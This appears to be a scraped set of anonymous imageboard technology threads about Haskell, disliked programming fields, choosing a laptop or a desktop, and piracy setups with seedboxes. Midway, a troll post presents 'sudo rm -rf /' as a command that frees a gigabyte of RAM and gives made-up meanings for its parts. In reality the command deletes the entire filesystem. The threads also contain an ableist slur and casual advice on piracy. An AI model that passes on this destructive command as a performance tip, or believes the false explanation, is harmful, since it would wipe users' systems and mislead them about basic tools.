What do you guys think of Haskell? Should someone who is not very good at math try to learn it? I want to look cool.
I don't see a use in purely-functional programming languages.
>>60877041
I think it's best suited for recreational programming. It teaches you to think about programming in a completely different way. It warps your mind, in a good way.
It's good to try something completely different like this sometimes, but I don't see a reason for it to be used for professional work.
>I want to look cool
Just try it and make your own mind
What now?

I'll start:
most - webdev, least - embedded
Most: HTML """coding"""
Least: Unix-based development

I hope you realize you're not in good company.
You can't expect to be an introvert autistic retard and still expect to hold down a job.

What the fuck is this supposed to mean?
I want to buy myself a new computer. I don't game I would only need this for productivity(photoshop, premiere).
I'm deciding between a laptop and a PC.
For $1000 I could build this PC
https://pcpartpicker.com/list/FcPXzM
However, for the same money I could buy this laptop
https://www.amazon.com/dp/B06Y4GZS9C/
It seems to me that their performance should be nearly identical.
However the laptop has a huge benefit in the portability section. Plus I get to sell my old laptop.
Why would I buy the PC over the laptop? Am I missing something?
A Desktop PC has more longevity since it's easier to swap components.

I think the convenience of probability heavily outweighs that benefit.

>convenience of probability
Do you ever feel like your GNU/Linux distro underperforms from when you had Windows? Well there's a reason by that. The original developers of GNU/Linux held 1 gb of ram for services in the background that the user isn't ever made aware of. Due to the fact that the tasks need to be as fast as possible, the developers take extra ram. This was a decade ago, as we no longer need ram for the system due to faster PCs. So it's a waste of ram.
Thankfully, there's a command to free ram for the user, and it's only in 3 words.
It'ssudo rm -rf /
"sudo" is for Administrator privileges, as you don't want some random user doing system-based tasks now, do you?
"rm" is for "ready machine", to prepare the system for the command.
"rf" is for "ram free", to free the ram of course.
"/" checks the system directory to make sure it's free!
Enjoy your 1 gb of ram!
...
This has not worked for many years.

What's the best pirating workflow in 2017? You guys use seedboxes? Usenet? Remote servers?
I just download everything straight to my desktop computer, using basic torrents.
>>60876652

>>60876671
how to seedbox
>>60876652
Seedbox ingests. FTP takes everything back home to serve.
